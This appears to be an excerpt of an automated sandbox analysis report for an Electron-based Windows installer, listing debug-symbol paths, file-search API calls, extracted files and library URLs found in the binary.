Source: Binary string: C:\projects\src\out\Default\electron.exe.pdb source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D3DCompiler_47.pdbGCTL source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2395663067.0000000005221000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pdb_base = "{}.{}.pdb".format(pdb_base, TARGET_TYPE_EXT[target_dict["type"]]) source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\projects\src\out\Default\vk_swiftshader.dll.pdb source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2461234245.0000000000849000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM | *.o | *.obj ) source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM | *.o | *.obj ) ;; source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ** for all file descriptors with rbu_file.pDb!=0. If the argument has source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: config_name, self.ExpandSpecial, output + ".pdb" source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ** rbu_file.pDb!=0. source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\projects\src\out\Default\vulkan-1.dll.pdb source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2388748403.0000000004DA0000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392116421.0000000005C20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2388942202.00000000055C0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeCode function: 0_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059CC
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeCode function: 0_2_004065FD FindFirstFileW,FindClose,0_2_004065FD
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile opened: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\localesJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile opened: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\resourcesJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile opened: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\resources\app.asar.unpacked\node_modules\screenshot-desktop\libJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile opened: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\resources\app.asar.unpacked\node_modulesJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile opened: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\resources\app.asar.unpackedJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile opened: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\resources\app.asar.unpacked\node_modules\screenshot-desktopJump to behavior
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/52560
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.izs.me/)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue5752
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://certificates.godaddy.com/repository/gd_intermediate.crt0
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://certificates.godaddy.com/repository100.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cldr.unicode.org/index/downloads
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/576694/.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.google.com/p/chromium/issues/detail?id=76293
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://code.google.com/p/closure-compiler/wiki/SourceMaps
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://code.google.com/p/gyp/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://code.google.com/p/gyp/issues/detail?id=111):
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.google.com/p/gyp/issues/detail?id=122
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://code.google.com/p/gyp/wiki/GypLanguageSpecification
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://code.google.com/p/python-gflags/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://code.google.com/p/smhasher/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/122592
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/142362.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/333738.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/35878
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.godaddy.com/gds1-20
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://developer.android.com/tools/extras/support-library.html
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://developer.apple.com/library/mac/#documentation/DeveloperTools/Reference/XcodeBuildSettingRef/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/common
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/commonnode-set..
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://fossil-scm.org).
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://git.linuxtv.org/v4l-utils.git
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://goo.gl/cuFbX
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://goo.gl/dhPnp
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://google.github.io/snappy/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://icl.com/saxon
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://icl.com/saxonorg.apache.xalan.xslt.extensions.RedirectxsltDocumentElem:
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2475862062.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2476010965.0000000002E0F000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2478072599.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2476074048.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://int3.de/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://istanbul-js.org/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://maxao.free.fr/xcode-plugin-interface/specifications.html
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://n8.io/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270865746.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://n8.io/)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000000.2153082985.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.godaddy.com/0J
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://opensource.perlig.de/rjsmin/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pages.citebite.com/v2o5n8l2f5reb))
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://public.kitware.com/Bug/view.php?id=8392
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://re-becca.org)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://re-becca.org/)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://s..
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slproweb.com/products/Win32OpenSSL.html
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://source.android.com/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://source.android.com/compatibility)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://src.chromium.org/viewvc/blink/trunk/Source/devtools/front_end/SourceMap.js
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://stackoverflow.com/a/62888/10333
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://stackoverflow.com/questions/1189781/using-make-dir-or-notdir-on-a-path-with-spaces
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://stackoverflow.com/questions/35817/whats-the-best-way-to-escape-ossystem-calls-in-python
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://stackoverflow.com/questions/37519828
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://substack.net)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tootallnate.net)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://web.archive.org/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://website-archive.mozilla.org/www.mozilla.org/mpl/MPL/NPL/1.1/):
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270865746.0000000006B20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cmake.org/Bug/view.php?id=6493
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cmake.org/pipermail/cmake/2010-July/038461.html
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.ecma-international.org/memento/codeofconduct.htm
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.finesse.demon.co.uk/steven/sqrt.html.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.fossil-scm.org/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gnu.org/software/make/manual/make.html#Syntax-of-Functions
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gutenberg.org/ebooks/53).
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.icu-project.org/userguide/posix.html#case_mappings
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.jclark.com/xt
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.linux-usb.org/usb-ids.html
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/MPL/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/NPL/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.opengroup.org/onlinepubs/009695399/utilities/xcu_chap02.html#tag_02_02
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.openradar.me/25313838
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.opensource.apple.com/source/cctools/cctools-809/misc/libtool.c
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.opensource.apple.com/source/distcc/distcc-2503/distcc_dist/include_server/headermap.py?tx
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.opensource.org/licenses/bsd-license.php
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pertinentdetail.org/sqrt
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.ploscompbiol.org/static/license
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.polymer-project.org
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.portaudio.com
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.softsynth.com
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270865746.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.suitable.com
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.suitable.com/tools/smslib.html
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.suitable.com/tools/smslib.html&gt;
